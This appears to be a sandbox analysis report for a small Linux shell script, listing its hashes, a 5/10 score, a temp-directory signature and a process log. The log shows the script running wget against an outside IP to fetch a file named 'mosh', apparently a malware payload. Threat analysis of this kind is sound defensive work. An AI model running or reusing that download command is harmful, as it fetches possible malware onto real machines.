664fd170b1d07e372b3daa91aab78a8151d3f0b0361a2b3157b405314dd219a2 | Triage

Resubmissions

20-04-2023 08:22

230420-j9jsfaae7s 10

27-03-2023 09:38

230327-lmbvescg32 10

Analysis

max time kernel
136s
max time network
154s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20221111-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20221111-enkernel:4.15.0-161-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
20-04-2023 08:22

Sharing

Report Analysis Logs

General

Target

f.sh
Size

518B
MD5

cac62e5664152a357145747ba5dbe0a2
SHA1

8402c68d0b57b04eb19f52c18fc57edbe716f0da
SHA256

919bce738726efdfd08aa43552e095851c52c7452ef4c6c03d2b4c08cbceda76
SHA512

6e19b9dbf0e3cff0397c6cdf1774bdd08070b509be2520c32a3148daa0211cf74a728f2e163199e789d5bbead4f9cd246853483e65526ddef1b14a62bdb6d52f

Score

5^/10

Malware Config

Signatures

Writes file to tmp directory 1 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
/tmp/f.sh	/tmp/f.sh	f.sh

/tmp/f.sh
/tmp/f.sh
1⤵
- Writes file to tmp directory
PID:607
- /usr/bin/wget
  wget http://93.174.93.45/mosh
  2⤵
  PID:608

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads